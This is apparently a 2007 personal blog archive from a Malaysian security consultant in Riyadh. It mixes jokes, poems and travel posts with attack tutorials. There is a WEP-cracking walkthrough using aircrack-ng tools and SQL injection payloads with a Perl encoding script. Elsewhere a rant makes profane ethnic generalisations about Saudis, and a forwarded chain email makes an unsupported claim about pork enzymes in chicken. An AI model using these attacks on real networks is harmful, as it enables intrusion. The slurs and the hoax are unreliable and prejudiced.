BUSY

Had a very very very long ddddaaayyyyyyyyyyyy

Tarian Bajau - IGAL IGAL

Persembahan oleh anak-anak buah aku di malam persandingan di Tawau, Sabah.

Simply Pelaut

"Only God knows" what is really hidden and abstract messages in this video.

The Dome of Rock - Batu Bergantung

Batu bergantung disebut dalam bahasa Arab sebagai Kubbah As-Shakra dan dalam bahasa Inggeris The Dome of The Rock. Ada cerita-cerita yang mengatakan bahawa batu ini terangkat ke atas ketika Rasulullah melepaskan kaki Baginda dari batu ini untuk melakukan mikraj ke Sidratul Muntaha. Batu ini dikatakan ingin mengikut Rasulullah waktu mikraj tetapi ditahan oleh malaikat Jibril. Bekas tapak tangan Jibril dikatakan masih ada dan dinamakan Kafaf Sayyidina Jibril.

Bagaimana pun, menurut Sayyid Muhammad bin Alwi Al-Maliki, ulama Masjidil Haram di Makkah, mereka yang berkata bahawa batu ini bergantung di antara langit dan bumi adalah tidak benar kerana kisah ini tidak tersebut dalam alQuran atau dalil-dalil yang kuat.

Batu ini panjangnya 56 kaki dan lebarnya 42 kaki dan berbentuk hampir separuh bulatan. Di tengah-tengah batu ini terdapat satu lubang yang turun ke bawah menuju ke sebuah gua kecil.

Utusan Raja Sehari

BISMILLAAHIR RAHMAANIR RAHIIM,
ASSALAMU ALAIKUM WARAHMATULLAAHI WABARAKAATUH.

TanSri/PuanSri, Dato/Datin, Rakan Taulan, Tuan/Puan, dan Encik/Cik

Alhamdulillah, syukur ke hadrat Allah Subhanahu Wata'ala, kerana dengan limpah kurnia dan izinNya akan bersatulah dua jiwa pada 28 Shawwal, 1428 hijrah bersamaan 9 November, 2007 ini.

2. Dengan ini, TanSri/PuanSri, Dato/Datin, Rakan Taulan,
Tuan/Puan dan Encik/Cik di jemput hadir ke majlis Raja Sehari pada 10/11/2007 bertempat di No. 12, Lorong Inai 5/1, Taman Setar, Alor Setar, Kedah Darul Aman bermula jam 12:00 tengah hari atau pada 24/11/2007 bertempat di No. 24, Kg. Air, KM7, Kg. Kinabutan Kecl, 91000 Tawau, Sabah bermula jam 7:30 malam.

3. Kehadiran TanSri/PuanSri, Dato/Datin, Rakan Taulan, Tuan/Puan dan Encik/Cik adalah sangat-sangat di alu-alukan. Semoga kehadiran dan iringan doa restu para jemputan sekeluarga akan menyerikan lagi majlis ini serta di berkati Allah SWT, Insha Allah.

Wabillahi Taufik Walhidayah,
Wassalamu Alaikum Warahmatullaahi Wabarakaatuh.

Peta rumah pengantin click di sini.

Gulfscan/FIT khalas

I'll depart from Riyadh airport tonight and leaving all the good people specially AwalNet and SAMA, the most "professional client" that I ever work with in Riyadh if you know what I mean.

It is a wonderful experience... at least I met new Malaysian friends.. folks from NasAir, Flysama, Nokia dude's, AZRB and the geng's and of course the Malaysian nurses. Its kinda hard to find a Saudi friend here because they still with the races and slaves thingie. I only have one Saudi friend, Faisal.. he is very very very very nice person.

Driving in Riyadh is a night mare, I mean.. they have the rules but its like 'fuck the rule, i'm the one who driving not you'.. They don't follow the lane, traffic lights, speed limits and "barking" area. Sometimes they drive with their feet or toe, can you imagine that?? I can say that Saudi's definitely can not drive out side of their country.

It's better to talk to rock rather than Saudi's. They are Hippocrates and always want to win even they don't know a shit. Most of them like "hey, you cannot do this and that" but you will see them do the exact things that you have been told not to do.

Their plan its like every 15 minutes, so all the projects will never on time. They will promise to you like "Insha Allah, bukra/tomorrow" and if you lucky you'll get the "promise" things like a year after that, if not its like waiting forever.

If you have a blue eye and white skin, this country is for you. BECAUSE they will listen to blue eye people. If you like from Asia or such, you'll be their slaves. I tell why.... imagine a meeting room attend by Asian, blue eye (canadian for example) and Saudi:

Asian: Ok, what you should do is put an A here and B there.
Saudi: No no no, you can not put that way, because I have something in there bla bla bla bla..
Asian: But that is how things supposed to be done.
Saudi: I don't care, you cannot do that. Is there any other solutions
Asian: (he tried to be polite.. uhmm... poliste my asssss!)
Blue eye: But, still that is things supposed to be done.
Saudi: Oh really?? Ok, khalass.. Do it...
Asian: (mother fucker!!!!!)

They have one magic answer for all unacceptable attitude they had, "this is a culture here"

CULTURE MY ASS!!!!


One of my friend said:

First thing first: be a human
Second: be a muslim
Third: Learn to be a muslim... and muslim did not teach you to treat other people like a slaves.

Farewell Riyadh...... I am khalasssss.... thanks to all "my friends"
Saaallaaaammsssss...

Akad Nikah

Pengantin: Bawo satu duo puluh dulu, lape kok tu.... tok tamboh lagi.
...
Pak Imam: aku terimolah nikohnyo... denge isi kawinnyo... makno tersobut..
Pengantin: aku terimo nikahnyo... nge isi kambing tukar nge uwe... wokaboooottt.......
...
Pak Imam: aku terimo nikohnyo..
Pengantin: aku moh nikohnyo..
Pak Imam: dengan isi kaweng...
Pengantin: dengan isi kambing..
Pak Imam: denge wangnyo
Pengantin: tukar nge iwekabot....
Pak Imam: torsobot.. toorrrrrr kataoo....
Pengantin: iwakabot! iwakabot!
Pak Imam: tor.. tor.. torsobot..
Pengantin: jiwakaboot....

WEP cracking with ipw2200

I was planning to buy ubuiqiti atheros wireless card last few months... but I don't really need that anymore. I now can cracked WEP wireless network with my build-in ipw2200 wireless card and without external wireless card.

These are the installation on my ubuntu, yours may differ but it should works in general if you have linux headers installed. In case you get an error compiling and missing file headers, you may download following packages:


apt-get install build-essential
apt-get install linux-source
apt-get install linux-headers-`uname -r`
apt-get install sharutils

make sure you have the core linux-headers available in your /usr/src/linux

mv /usr/src/linux-headers-`uname -r` /usr/src/linux_bak
ln -s /usr/src/linux-headers-`uname -r`/ /usr/src/linux
ls -l /usr/src/linux/ # Should not be empty

I downloaded the source code for ipw2200 version 1.2.1 here, ieee80211 version 1.2.17 here and ipw2200 injection patch for v1.2.1 from here.

Putted all downloaded files in the same directory and cd into that directory in a terminal unpack archives

shaolinint@slash# tar -xvf ipw2200-1.2.1-inject_patch.tar.gz
shaolinint@slash# tar -xvf ipw2200-*.tgz
shaolinint@slash# tar -xvf ieee80211-*.tgz

apply patch

shaolinint@slash# patch -p0 < ipw2200-1.2.1-inject.patch
shaolinint@slash# patch -p0 < ipw2200-1.2.1-inject_Makefile.patch

change ipw2200 Makefile from:

ifndef
CONFIG_IPW2200
EXTERNAL_BUILD=y
CONFIG_IPW2200=m
CONFIG_IPW2200_DEBUG=y
CONFIG_IPW2200_QOS=y
...
endif

to

#ifndef
CONFIG_IPW2200
EXTERNAL_BUILD=y
CONFIG_IPW2200=m
CONFIG_IPW2200_DEBUG=y
CONFIG_IPW2200_QOS=y
...
#endif


compiling ieee80211 and ipw2200:

shaolinint@slash# cd ieee80211-*
shaolinint@slash# ./remove-old
shaolinint@slash# make
# 'y' in all Questions
shaolinint@slash# make install

shaolinint@slash# cd ../ipw2200-1.2.1
shaolinint@slash# ./remove-old
# 'y' in all Questions
shaolinint@slash# make
shaolinint@slash# make install

shaolinint@slash# rmmod ipw2200
shaolinint@slash# modprobe ipw2200 rtap_iface=1

ready to go (opened different terminal on each command):

ASSUMED:
ESSID = pgxtest
BSSID = 00:11:22:33:44:55
ETH1 MAC = 00:00:11:11:22:22
FFFF-FFFF: dummy key, could be anything

shaolinint@slash# iwconfig eth1 essid pgxtest key FFFF-FFFF mode managed
shaolinint@slash# airodump-ng --channel 11 --bssid 00:11:22:33:44:55 -w airodump -i rtap0
shaolinint@slash# aireplay-ng -3 -x 1000 -b 00:11:22:33:44:55 -h 00:00:11:11:22:22 -i rtap0 eth1
shaolinint@slash# aircrack-ng airodump.ivs

Enzim babi dalam daging ayam

Hari ini ada satu email menarik yang aku nak kongsi dengan korang. Maklumat lanjut klik di sini.

Assalamualaikum semua.

terlanjur sahabat saya ,che ismail dah buka cerita,wajib saya
berkongsi.

Jika anda pernah come across Majalah 3 pada bulan July ade paparan ttg ayam organic herba di usahakan seorang profesor - Dr Mohamad Zainol Abdul Haja. Saya tertarik dgn cara pembiakan ayam yg Dr Zainol usahakan,bersih,terkawal dan halal.

Saya dan suami menjejaki Dr Zainol,dpt jumpa,berborak,sy juga pernah bawa Dr Zainol dan isteri beliau Dr Mumtaz ,berjumpa dgn network saya di Melilea Puchong.Sekadar ingin mengajak beliau berkongsi pengalaman dgn kami.

Saya kagumi insan ini,mengorbankan kerjaya profesional utk akhirnye
memilih jalan berbakti kepada ummah.Terlalu mudah akidah umat islam di Malaysia kini diperalat,kami sgt sedih.Matlamat kami samainsyaallah.

Sungguh,teknologi menjadikan kita negara yg moden,teknologi juga akan kemudiannye merosak byk perkara baik dlm tubuh kita..yg akhirnye akan merosak akidah.Kalau hendak dicerita,sgt panjang.
Saya ringkaskan.

Wujud enzim khinzir dlm ayam diper akui setelah bbrp tahun buat
research,malah byk website yg ade maklumat ini,sy akan beri add nnt. Enzim khinzir mungkin tidak terlabel secara individual dlm proses menggemukkan ayam(m'sia tidak akan buat label ) ,tp hasil dari kajian,protein dari khinzir,antibiotik,dan pelbagai lagi mampu menyuburkan ayam,cepat gemuk,lg berat lagi cepat boleh jual,cepat dpt hasil. maka suntikan,makanan ayam ade campuran pelbagai yg sumbernya diragui.

Thats y,dari telur hungga ia menjadi hidangan anda,ayam tidak perlu
mengambil masa berbulan bulan..ayam KFC cuma 28 hari,ayam daging mungkin 40 hari...sy tidak pasti.

Lately sibuk harga ayam naik,sy come across pulak seorang pengusaha
ayam berbangsa china di Buletin Utama 2 mlm yg lalu,"harga ayam mesti mau naik sikit, makanan ayam pun ssulah naik halga,itu UBAT ayam pun sudah naik halga"...ubat ???..tapi tiada apa lagi yg memeranjatkan saya....anda fikirkan,anda nilailah.Ayam kat malaysia ni sampai dah macam tak cukup supply,hg semakin lama semakin naik,yg gemuknye pengusaha ayam cina inilah.

Halal ke ayam daging? tidak mengapa jika anda pasti dan yakin ttg kehalalannye,tambahan di Malaysia ade sykt besar yg melabelkan halal utk ape pun jua produk
ayamnye. tetapi Taraf Halal itu ,saya anggap ia hanye di kategorikan utk PROSES PENYEMBELIHAN cara islam yg diutamakan di sykt itu..even pernah masuk TV,tetapi cara ayam dibesarkan,di beri mkn makanan yg bagaimana tidak mungkin termasuk dlm HALAL yg dimaksudkan....anda fikir bagaimana?

Sy pernah bertanye kpd Dr Zainol,government negara islam ini tak berbuat ape ape ke? Dia jawab,it happens around the world nanee.its the technology!!

Percaya atau tidak,sewaktu Dr Zainol confirm ayam daging ini ade enzim khinzir,beliau menangis,after a long time of research,baru skrg confirm!! Saya juga sgt sedih..sgt sgt sedeh. Bayangkan kotornye,hinanya makanan yang kita mkn,makanan yg membentuk 'kita'.

Ayam daging biasanya dlm 20 minutes kalau letak kat luar peti sejuk
mesti lalat dah datang,bau dia mak aaaaiiiii...senang hanyir, kenapa? Ade certain part part ayam ni daging dia punyelah padat dan banyak kan...kenapa ye...fikir fikirkan.

Saya tidak berniat mempromosi ape ape,sy juga tiada share dlm biz Dr Zainol, tapi saya seru, kepada sesiapa sahabat yg terbaca email ini, mungkin skrng tiba masanye kita mengubah sumber pemakanan kita..maafkan saya jika terlambat bercerita,sy hanya manusia, kdg2 sy takut juga pandangan ikhlas saya di salah erti.

Pernah beberapa kali sy bercerita kpd kwn kwn, tapi cerita sy di anggap seperti diada adakan,malah ade yg tak respon ape ape, (bila pk pk kelakar pun ade,takkan benda dasyat mcm ni takde respon ek...) jd sy berhenti bercerita seketika..maafkan sy terlambat memanjangkan kepada kwn kwn.. but anyway inilah sebenarnye tanggungjawab kita.

Fwd this mail to your friends, kita ambillah tanggungjawab ini. insyaaallah Allah berkati.

last mth pun article Ayam Organic ade keluar kat Berita Harian, full page, kat dlm tu pun ade ttg enzim khinzir ini.

Anyway sy dan keluarga kini tidak lagi risau harga ayam daging ni naik ke turun ke, lantokkkkkk le dia.... Ayam organic jauh lebih sedap, manis n tak byk daging.,yg penting kita pasti ttg sumber pembesaran ayam ini.,insyaallah.

TQ & Regards.
Nanee
Attached (no 1-3) mail from Dr Zainol,panjang,tapi make sure u read
the last page.he also provided some website add for you to refer.

(1)
Asssalammualaikum

This is the article on pork protein used in chicken breeding. Pls spread around.

wassalam

Dr. Mohamad Zainol Ahmad Haja
Head - Research & Development
Innovation Centre
Mumtaz Meat & Marine Foods Sdn Bhd.
No 17. Jalan Nirwana 35.
Taman Nirwana. 68000 ampang.
Selangor. Malaysia.
Tel 603 92811802 / 92816924
Fax 603 92816925
e mail nattpro@streamyx.com
mobile 6012 3248081

Jangan batal sembahyang, beb!

Pada suatu hari jumaat yang hening amat naik bas ke masjid untuk menunnaikan sembahyang jumaat. Mat Amat memberikan seringgit untuk tambang bas pergi dan balik memandangkan Amat dah pon makan tengahari di rumah.adapon,perjalanan ke masjid itu 10 km jauhnya.

Amat pon membayar tambang bas 50 sen kepada konduktor yang ensem itu. lalu konduktor tu pun memulangkan baki wangnya dengan duit syiling 50 sen sekeping.Amat pon ambik duit tu simpan dalam kocek baju melayunya.

Sesampainya di masjid, Amat pon mengambil tempat di saf kedua memandangkan saf pertama sudah pon penuh adanya. Setelah azan berkumandang, pak imam pon mengimamkan solat Zohor berjemaah itu.

Amat pon menunaikan sembahyang berjemaah itu..semasa para jemaaah rukuk termasuk Amat sekali...tiba2 duit 50 sen nya jatuh dan tergolek betul2 jatuh di bawah telapak tangan orang dihadapannya.. risau bila pikir nak jalan kaki balik rumah di panas2 terik tu..amat pon berbisik kepada orang dihadapannya...

Amat: "jangan ambik duit aku tu,aku nak buat tambang balik nanti.."

Lalu orang itupun menjawab.."alah,setakat 50 sen aku x heran la, tader sape nak ambik duit kau tu". Lalu orang disebelah Amat pula yang terkejut kerana Amat bercakap di dalam sembahyang pon berkata..." eh, korang nie..dalam sembahyang mana boleh bercakap".. selepas itu,ada seorang yang lain pula bersuara " yang kau bercakap tu aper "....

Sahlah.. sembahyang mereka telah terbatal hanya kerana 50 sen.

MORALNYA : jangan bercakap dalam sembahyang..lupakan hal2 dunia bila mengadap Allah Yang Maha Esa..

Absent for HITB again

HiTBSecConf2007 Malaysia is over and I missed it again.

You know what I missed the most? CTF game! It's fun, gain more knowledge and meet new friends. This year SaoVang (Vietnam) won the competition, WabiSabiLabi (Switzerland - picture) in 2nd place and Padocon (Korea) in 3rd place. The US Army tried their luck again when HiTBSecConf2007 Dubai gave them nothing I guess.

My favorite team is WabiSabiLabi, I don't know them.. just because I like the apple logo, hehe.

Actually, SaoVang is the one. They are from VNSEC and the most talented and high skills group in Asia, I guess..... ^-^

-quote from wabisabilabi blog-
"A particular mention to the US Army team (Army Strong). They didn't succeed in scoring any hacking task, but they succeeded to get the best defensive points. Considering that their critical mission in every day's life is to defend the US Army network (they don't have any legal right to attack), we think that they met their mission objective which was to come to the CTF to score the best in defense. Mission accomplished, congratulation US Army Team!"
-end of quote-

More information here and here.

Hilang Kunci Motor

Pengertian Merdeka

Chat 1:
slash: oit x tido ke?
jibam: lom tidur
slash: wah.. lewat..
slash: tahun ni merdeka dari apa?
jibam: tahun ni merdeka
jibam: merdeka leh tidur lambat
jibam: kalau tak merdeka dah tidur dah ni
jibam: sebenarnya, kita patut bersyukur sebab celik celik je dah merdeka
jibam: tak semestinya merdeka dari penjajah je
jibam: diri kita, hati kita pun kena gak merdeka dari segala belengu yang melanda diri kita
jibam: pendek kata, banyak maksud dia
jibam: dan semuanya terpulang pada diri masing masing
slash: wah. satu penjelasan yg pjg lebar..

Chat 2:
slash: ko tahun ni merdeka dari apa?
perantau_riyadh: haha tahun nih tak merdeka langsung
perantau_riyadh: jadik tahanan hehe
slash: jadi tahanan pak arab di riyadh sebab tak dapat exit entry visa?
perantau_riyadh: haha yela
slash: saya setuju

Chat 3:
slash: oit..
slash: tahun ni merdeka ke tidak?
sirtempeyek: merdeka la
slash: merdeka dari apa? apo pengertian merdeka ko tahun ni?
sirtempeyek: aku dah berubah menjadi seorang yang berguna untuk bangsa, negara dan awek
slash: wah. power tu.. berguna tu maksudnya baru start keje ke apa?
sirtempeyek: lebih kurang la.. start kumpul duit nak kawin

Chat 4:
slash: so apa pengertian merdeka ko tahun ni?
gabres: x der apa
gabresr: mcm biasa jerk
slash: ko ni mmg takde perasaan patriotik langsung, hehe

Happy 50th Independence Day Malaysia

Every 31st of August every year, it is the day when all Malaysian come together to celebrate their nation’s Independence Day - some of us call it National Day. This year Malaysia will again celebrate the birthday - 50 years Independence to be exact from Japanese and British colonize.

Malaysia has come a long way to come to where its now - a modern nation full of vibrant, colorful culture and people. From a nation that depends so much on agriculture to a developing country full of promise in many areas of the economy. Malaysia has achieved so many things over the years.

Today, I am calling out to all Malaysian bloggers - let us show some love to our nation and display our patriotism on our blogs. Let us be proud to be Malaysian and show the same pride, courage and honor like our 'Bapa Kemerdekaan' Tunku Abdul Rahman and all the previous Malaysian citizens during their time.

Perjuangan Yang Belum Selesai

Sesungguhnya tidak ada yang lebih menyayatkan
dari melihat bangsaku dijajah
Tidak ada yang lebih menyedihkan
dari membiarkan bangsaku dihina

Air mata tiada ertinya
sejarah silam tiada maknanya
sekiranya bangsa tercinta terpinggir
dipersenda dan dilupakan

Bukan kecil langkah wira bangsa
para pejuang kemerdekaan
bagi menegakkan kemuliaan
dan darjat bangsa
selangkah beerti mara
mengharung sejuta dugaan

Biarkan bertatih
asalkan langkah itu yakin dan cermat
bagi memastikan negara
merdeka dan bangsa terpelihara
air mata sengsara
mengiringi setiap langkah bapa-bapa kita

Tugas kita bukan kecil
kerana mengisi kemrdekaan
rupanya lebih sukar dari bermandi
keringat dan darah menuntutnya

Lagi pula apalah ertinya kemerdekaan
kalau bangsaku asyik mengia dan menidakkan,
mengangguk dan membenarkan,
kerana sekalipun bangganya negara
kerana makmur dan mewahnya,
bangsaku masih melata
dan meminta-minta di negaranya sendiri

Bukan kecil tugas kita
meneruskan perjuangan kemerdekaan kita
kerana rupanya selain memerdekakan,
mengisi kemerdekaan itu jauh lebih sengsara

Bangsaku bukan kecil hati dan jiwanya
bukankah sejak zaman berzaman
mereka menjadi pelaut, pengembara
malah penakluk terkemuka?
Bukankah mereka sudah mengembangkan sayap,
menjadi pedagang dan peniaga

selain menjadi ulama dan
ilmuan terbilang?
Bukankah bangsaku pernah mengharung
samudera menjajah dunia yang tak dikenal
Bukankah mereka pernah menjadi
wira serantau yang tidak mengenal
erti takut dan kematian?
Di manakah silapnya hingga bangsaku
berasa begitu kecil dan rendah diri?
Apakah angkara penjajah?
Lalu bangsaku mulai
melupakan kegemilangan silam
dan sejarah gemilang membina empayar

Tugas kita belum selesai rupanya
bagi memartabat dan
memuliakan bangsa
kerana hanya bangsa yang berjaya
akan sentiasa dihormati

Rupanya masih jauh dan berliku jalan kita
bukan sekadar memerdeka dan mengisinya
tetapi mengangkat darjat dan kemuliaan
buat selama-lamanya

Hari ini, jalan ini pasti semakin berliku
kerana masa depan belum tentu
menjanjikan syurga
bagi mereka yang lemah dan mudah kecewa

Perjuangan kita belum selesai
kerana hanya yang cekal dan tabah
dapat membina mercu tanda
bangsanya yang berjaya

Dr. Mahathir Mohamad
Mei 1996

Just another day in Riyadh

Check out the break dance and the DJ at the back :)

SQLinjection -- convert method (continue)

My friend told me to encode some of the injection parameter from ascii to hex code. So I write a small perl script to do the job for me:

shaolinint@slash$ cat ascii2hex.pl
#! /usr/bin/perl
my $cmd = shift or die "usage: $0 string\n";
$cmd =~ s/(.)/ sprintf("char(0x%2x)%2B",ord($1)) /ge;
chomp($cmd);
print "$cmd\n";

shaolinint@slash$ perl ascii2hex.pl table1 char(0x74)%2Bchar(0x61)%2Bchar(0x62)%2Bchar(0x6c)%2Bchar(0x65)%2Bchar(0x31)

I had to removed the '%2B' at the end of the code above to make it work on real injections:

shaolinint@slash$ lynx -dump http://www.target.com/hello.aspx?id=(convert(varchar(255),(SELECT+top+1+table_name+FROM+
information_schema.tables+WHERE+table_name+NOT+IN(char(0x74)%2Bchar(0x61)%2Bchar(0x62)
%2Bchar(0x6c)%2Bchar(0x65)%2Bchar(0x31))))--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '{]table2 to a column of data type int.

The injections parameter working fine for me. But there is small problem, I still can not get the data from all tables and columns at the moment.

SQLinjection -- convert method

Last Saturday I started Portal Security Assessment for one of my client here in Saudi. And last night I completed a validation of all my findings. What make interesting during the assessment is, I found a potential SQL Injection on the portal which is a good thing for me... But the challenge is to enumerate tables and columns manually since most of tools that supposed to get the information failed to do so.... So I tried manually and play around with the injections but I still couldn't get what I want.

During my homeworks, I found a few interesting ways to print some of the informations. If you have any idea how to use following methods to enumerate tables and column, please let me know.

convert(int,convert(varchar,INJECTION_PARAMETER_HERE)) (convert(varchar(255),(INJECTION_PARAMETER_HERE)))--

For example:

http://microsoft.com/hello.asp?id=convert(int,convert(varchar,@@version))
http://microsoft.com/hello.asp?id=(convert(varchar(255),(@@version)))--

Chinese Pirates Copy iPhone, Make Improvements

"Popular Science notes that manufacturers in China duplicate many well-know products. This includes the Apple iPhone, imitations of which are rolling off the assembly line already. That might actually be a good thing for some users, who might enjoy the user experience of China's own miniOne. 'It ran popular mobile software that the iPhone wouldn't. It worked with nearly every worldwide cellphone carrier, not just AT&T, and not only in the U.S. It promised to cost half as much as the iPhone and be available to 10 times as many consumers.' The cloned iPhone uses a Linux-based system. 'The cloners hire a team of between 20 and 40 engineers to begin decoding the circuit boards. At the same time, coders start to develop an operating system for the phone with a similar feature set. (The typical cloner either uses off-the-shelf code, writes something entirely new, or modifies a publicly available Linux-based system.)' Using the iPhone as an example, the PopSci site walks through the process of making imitation technology."

Chaos Communication Congress 2007: Call for Participation

The 24th Chaos Communication Congress (24C3) is the annual four-day conference organized by the Chaos Computer Club (CCC) in Berlin, Germany. First held in 1984, it since has established itself as “the European Hacker Conference”. Lectures and workshops on a multitude of topics attract a diverse audience of thousands of hackers, scientists, artists, and utopists from all around the world. The 24C3s slogan is Volldampf voraus! – the German equivalent of “full steam ahead” – a particular request for talks and projects featuring forward looking hands-on topics. The Chaos Computer Club has always encouraged creative and unorthodox interaction with technology and society, in the good tradition of the real meaning of “hacking”.

Topics
The 24C3 conference program is roughly divided into six general categories. These categories serve as guidelines for your submissions (and later as a means of orientation for your prospective audience). However, it is not mandatory for your talk to exactly match the descriptions below. Anything that is interesting and/or funny will be taken into consideration.

More info here and here.

What Hackers Learn that the Rest of Us Don't

Sergey Bratus contrasts developers and academic programs with what "hackers" do on his article titled "What Hackers Learn that the Rest of Us Don't" in the July/August 2007 IEEE Security and Privacy magazine. For example:

Developers are under pressue to follow standard solutions, or the path of least resistance to "just making it work."

Developers are de facto trained to ignore or avoid infrequent border cases and might not understand their effects.

Developers might receive explicit directions to ignore specific problems as being in other developers' domains

Developers often lack tools for examining the full state of the system, let alone changing it outside of the limited API.

If you understand this statements:

"In a typical academic setting... an ever-increasing number of topics limits the time the students and teachers can allocate for any specific one."

oh wait! its FTV midnight hot......... I'll make it quick. Read this posts.

WinOSX

I really like OSX interface.. I think its cool and the best interface for desktop. Because of that, I configured my windows just look like MacOS.

Lost for Mont Blanc

Last night me and my friend went to Granada Center, one of the largest shopping mall in Riyadh. After driving to no where.. we kinda lost a bit because my friend enjoyed his story and made me lost and forgot our destination. After a few hour driving we think we missed the exit to Granada, so we kept driving until we find a u-turn. I check my watch and it's almost 9:30pm in Riyadh... Wooppss!!! I saw Granada and the 4 mini KLCC towers, its like magic! I like Saudi's.. miracle is everywhere, hehehe. We are there! Masha Allah! But anyway... it turns me crazy, I saw this sun glass.. the shape is just like Jessica Alba, Mont Blanc... pretty cool... So I asked the sales man for price... Masha Allah.. Can you imagine how much is the price for Mont Blanc sun glass?? oh man!!! oh man!!! oh man!!! Long story short, I decided to take the sun glass home with me. Once in a life time :)

Voip Rakyat

My friend (rosli) asked me to download and used voip rakyat last few days. But I only have opportunity to tests it today.

So, he called me and started our conversations. After few minutes... I really like the results. I'm impressed! His voice is cleared, my video (webcam) movement are faster then yahoo messenger and skype. Well... at least on my computer. Another great released from Indonesian folks. Five stars rate from me. Highly recommend if you voip lover. More info here.

My voip rakyat info:
Name: shaolinint
Username: 55543
Line speed: 128 kbs
Call Location: Riyadh, Saudi Arabia
Call Destination: Kuala Lumpur, Malaysia

Doktor Pakar

Pesakit: "Doktor, berapa lama tulang saya yang retak ini akan sembuh ?"
Doktor: "Paling cepat enam minggu lagi "
Pesakit: "Bila saya telah sembuh, adakah saya akan mampu dan pandai bermain muzik seperti biasa? "
Doktor: "Oh .... tentu saja ! "
Pesakit: "Hebat! Padahal sebelum ini saya belum pernah bermain muzik. "

Cemburu

Aku rasa kan, tak patut lah isteri-isteri bersikap begini. Main belaaassaaahh je! Tak patut tak patut!

Seorang isteri ingin menghubungi suaminya, tetapi telefonnya tidak berkredit lalu menyuruh anak lelakinya menyampaikan mesej penting kepada si suami yang sedang bekerja di site.

Selepes si anak membuat panggilan, si anak memberitahu ibunya seorang perempuan lain yang menjawab pesanan telefon. Walaupun sudah berkali-kali si anak menelefon, tetap perempuan itu juga yang menjawab.

Si isteri pun dengan marahnya menunggu kepulangan suami dari kerja di depan pintu rumah. Sesampainya suami, si isteri membelasah habis-habisan si suami kerana perlakuan curangnya.

Habis berkumpul jiran tetangga di depan rumah untuk melihat drama petang itu. Si isteri menyuruh anaknya memberitahu semua orang apa yang dikatakan oleh perempuan di talian tadi.

Si anak pun cakap "Harap maaf, nombor yang anda dail berada di luar kawasan liputan. Sila cuba sebentar lagi".

Flight Engineer

When we are in the airport, a lot of times we can see the pilots and cabin crew walking by us and begin admiring their glamorous career on board the aircraft, but do we know who is the one responsible for the maintenance aspect of the aircraft that they working on? That person is Licensed Aircraft Maintenance Engineers, he is the one responsible to make sure that an aircraft is save to fly, to carry passengers or cargo's from one point to another point and I know and met one of them, Brother Helmi. If you think you know everything about flight and glamorous career, you wrong. Take a journey to his website, you gonna like it.

Murid sekolah

Kelas A:
Guru:Jika ayah kamu mendapat RM80 seminggu dan memberi emak kamu separuh,berapakah yang ayah kamu dapat?

Murid:PERANG!!

Kelas B:
Cikgu: Cikgu minta kamu ceritakan tentang mak masing2
Murid A : Emak saye seorang yang penyanyang tapi kuat berleter.

Murid B: (dgn bersungguh-sungguh) Emak saye pulak sungguh cantik tapi sampai sekarang belom berkahwin. (^-^)

Kelas C:
Cikgu: Baiklah murid-murid...hari ini kita akan belajar ABC
Murid C: Saye tak suka ABC la cikgu, cincau ada tak?

Why Islam

I think this is a must see video. Now I know why most of Saudi women are not working. It is because of they choose not to work.

Stesen Minyak Betranos

Rahman bekerja di stesen minyak Betranos, Jalan King Fahad, Riyadh. Dia selalu melayani pelanggan yang ingin mengisi minyak ke dalam kereta. Pada suatu hari minyak di stesen tersebut telah habis dan perlu menunggu lagi 4 jam untuk minyak di isi semula. Rahman akan memberitahu kepada pelanggan bahawasanya minyak telah habis. Tiba-tiba datang pula pelanggan berbangsa Arab bersama kenderaan. Rahman lega sedikit, bukan apa dia ingat pak arab itu bawa unta. Tapi gelabah juga si Rahman ni akibat tidak tahu bercakap arab. Akhirnya terlintas satu ayat arab yang biasa digunakan untuk menggambarkan sesuatu itu habis. Rahman berkata kepada pak arab tersebut "Encik, minyak sudah habis, SADAQALLAHULLA'ZIMMM".

Peribajau 3: Semmut Keyat

Semmut Keyat - pronounce as Semut K-Yat, bermaksud 'Semut Merah'. Aku dapat idea nak buat peribajau ni sebab aku ada kawan di Riyadh ni yang frust menonggeng tak dapat nak balik Malaysia sebab ada masalah yang belum selesai lagi. Kesian kat dia...

Aku rasa tak payah lah aku terangkan panjang lebar, cuma peribajau ni bukanlah di antara dua orang bercinta, tapi peribajau ni sebenarnya di antara orang-orang yang rasa diri mereka besar dan berkuasa dengan orang yang takde atau "tak punya apa-apa". Faham-fahamlah kan. Korang dengarlah lagu ni dan hayati liriknya, okay?

vSwitch

VMware open development of ESX Virtual Switches to Third Party vendors, and Cisco is expected to be the first company announcing such product, perhaps Virtual Catalyst?

You must read this and this.

"A virtual switch, vSwitch, works much like a physical Ethernet switch. It detects which virtual machines are logically connected to each of its virtual ports and uses that information to forward traffic to the correct virtual machines. A vSwitch can be connected to physical switches using physical Ethernet adapters, also referred to as uplink adapters, to join virtual networks with physical networks. This type of connection is similar to connecting physical switches together to create a larger network. Even though a vSwitch works much like a physical switch, it does not have some of the advanced functionality of a physical switch. For more information on vSwitches"

To me, again it will be a new security issue of course. We'll see...

uDc team members

MegaGath is over! I couldn't participate this time but some of uDc team members is there. It's not a security conference or similar it's just a gathering and celebration for one of our friend that going to leave the country very soon.

I wish him all the best and hope he will find his soul mate.

There is a good news too, CursedDaemon (picture: left), the youngest team member of uDc are now back in town. He is now continuing his study. Wish him all the best too!

I missess all you guys special CursedDaemon, my vocabulary. I hope I'll see him when I get back to Malaysia and have a teh tarik at mama stall.

Wish You Were Here

Pink Floyd song cover by Marty Casey. This song reminds me to my family and my home town.

So... so you think you can tell, Heaven from Hell, blue skies from pain.. Can you tell a green field.. from a cold steel rail? A smile from a veil? Do you think you can tell? And did they get you to trade.. your heroes for ghosts? Hot ashes for trees? Hot air for a cool breeze? Cold comfort for change? And did you exchange.. a walk on part in the war, for a lead role in a cage? How I wish, how I wish you were here. We're just two lost souls swimming in a fish bowl, year after year, Running over the same old ground. What have we found? The same old fears. Wish you were here.....

Pidgin

I like pidgin for chatting when ever I'm running Linux.

add debuntu repo and gpg key:

slash@shaolinint# echo 'deb http://repository.debuntu.org/ feisty multiverse' >> /etc/sources.list
slash@shaolinint# wget http://repository.debuntu.org/GPG-Key-chantra.txt -O- | apt-key add -

update repo and install pidgin:

slash@shaolinint# apt-get update
slash@shaolinint# apt-get install pidgin

And that's it, simply 1 2 3 :)

Hackers On A plane

2007 is a very special year for the global hacker community. Thanks to cooperation between the organizers of DefCon XV and the Chaos Communications Camp 2007, the two largest gatherings of hackers from around the world happen only a few days apart!

